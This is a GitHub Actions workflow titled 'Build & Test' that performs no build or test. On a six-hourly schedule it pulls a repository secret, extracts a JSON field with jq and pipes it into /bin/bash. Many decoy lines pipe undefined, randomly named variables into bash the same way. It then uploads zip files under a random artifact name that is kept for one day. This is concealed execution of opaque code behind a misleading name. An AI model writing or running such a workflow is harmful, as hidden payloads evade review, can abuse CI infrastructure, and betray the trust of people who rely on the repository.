name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '29 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          rd6: ${{ secrets.rd6 }}
        run: |
          printf '%s' "$rd6" | jq -r .bnoaa2207 | /bin/bash
          echo $hi92200 | jq -r .bwr1784 | /bin/bash
          printf '%s' "$cpf89" | jq -r .xk77208 | /bin/bash
          echo $z45393 | jq -r .hmlv2 | /bin/bash
          echo $j78 | jq -r .hpo5622 | /bin/bash
          printf '%s' "$bc04115" | jq -r .eo36 | /bin/bash
          printf '%s' "$mlw959" | jq -r .xhh6 | /bin/bash
          printf '%s' "$w37" | jq -r .xvv6320 | /bin/bash
          printf '%s' "$zlarb0942" | jq -r .dfhk23193 | /bin/bash
          echo $bd135 | jq -r .cpwny596 | /bin/bash
          echo $tohd53 | jq -r .n08592 | /bin/bash
          echo $ugilw405 | jq -r .ffz32 | /bin/bash
          printf '%s' "$ymo2426" | jq -r .aefcr3542 | /bin/bash
          echo $o65 | jq -r .qfsjo33 | /bin/bash
          echo $pyul4 | jq -r .ug72354 | /bin/bash
          echo $rcw5772 | jq -r .prv83352 | /bin/bash
          printf '%s' "$o76405" | jq -r .qn75 | /bin/bash
          echo $b40606 | jq -r .gx24 | /bin/bash
          echo $us07355 | jq -r .pnf7887 | /bin/bash
          echo $dsmyb8 | jq -r .xb33076 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: Yvs5NVBa
          path: "*.zip"
          retention-days: 1
